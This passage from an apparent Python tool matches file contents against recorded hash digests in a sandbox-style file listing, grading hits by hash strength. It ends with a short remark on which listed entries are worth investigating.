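    """Return every record whose recorded digests agree with `data`.
    'strong' requires SHA256 or SHA512 agreement; MD5/SHA1-only hits are 'weak'."""
    mine = hash_bytes(data)
    hits = []
    for rec in records:
        agreeing = [alg for alg, h in rec.digests.items() if mine[alg] == h]
        if not agreeing:
            continue
        strength = "strong" if {"SHA256", "SHA512"} & set(agreeing) else "weak"
        hits.append({"path": rec.path, "filesize": rec.filesize,
                     "matched": agreeing, "strength": strength})
    return hits


# Constructed from two entries on this page (one without a recorded path).
SAMPLE_LISTING = r"""
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Network\SCT Auditing Pending Reports
Filesize2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
"""

if __name__ == "__main__":
    recs = parse_listing(SAMPLE_LISTING)
    for hit in match_iocs(b"{}", recs):
        print(hit)
```

Most paths recorded in this listing are browser cache, Firefox telemetry and LevelDB state, so a hash hit on one of them says little on its own; the unnamed multi-megabyte entries are the ones worth pivoting on, and the parser keeps their digests even though their paths are absent.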